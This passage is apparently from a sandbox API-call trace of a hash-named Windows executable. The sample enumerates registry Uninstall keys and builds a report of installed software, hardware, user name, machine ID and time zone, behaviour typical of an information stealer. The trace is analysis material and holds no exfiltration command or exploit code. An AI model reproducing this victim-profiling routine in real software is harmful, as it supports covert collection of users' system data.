11.0.61030") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030" [0208.105] RegQueryValueExA (in: hKey=0x3a4, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19d62c, lpData=0x19ca18, lpcbData=0x19ce18*=0x400 | out: lpType=0x19d62c*=0x1, lpData="11.0.61030.0", lpcbData=0x19ce18*=0xd) returned 0x0 [0208.105] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030", lpString2=" " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 " [0208.105] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 ", lpString2="11.0.61030.0" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0" [0208.106] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\n" [0208.106] RegCloseKey (hKey=0x3a4) returned 0x0 [0208.106] RegEnumKeyExA (in: hKey=0x3a8, dwIndex=0x18, lpName=0x19d228, lpcchName=0x19ce18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{3c3aafc8-d898-43ec-998f-965ffdae065a}", lpcchName=0x19ce18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0208.106] wsprintfA (in: param_1=0x19ce28, param_2="%s\\%s" | out: param_1="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\{3c3aafc8-d898-43ec-998f-965ffdae065a}") returned 94 [0208.106] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\{3c3aafc8-d898-43ec-998f-965ffdae065a}", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ce24 | out: phkResult=0x19ce24*=0x3a4) returned 0x0 [0208.106] RegQueryValueExA (in: hKey=0x3a4, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19d62c, lpData=0x19ca18, lpcbData=0x19ce18*=0x400 | out: lpType=0x19d62c*=0x1, lpData="Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501", lpcbData=0x19ce18*=0x3d) returned 0x0 [0208.106] lstrlenA (lpString="Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501") returned 60 [0208.106] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\n", lpString2="Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501" [0208.106] RegQueryValueExA (in: hKey=0x3a4, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19d62c, lpData=0x19ca18, lpcbData=0x19ce18*=0x400 | out: lpType=0x19d62c*=0x1, lpData="12.0.30501.0", lpcbData=0x19ce18*=0xd) returned 0x0 [0208.106] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501", lpString2=" " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 " [0208.106] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 ", lpString2="12.0.30501.0" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0" [0208.107] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\n" [0208.107] RegCloseKey (hKey=0x3a4) returned 0x0 [0208.107] RegEnumKeyExA (in: hKey=0x3a8, dwIndex=0x19, lpName=0x19d228, lpcchName=0x19ce18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: 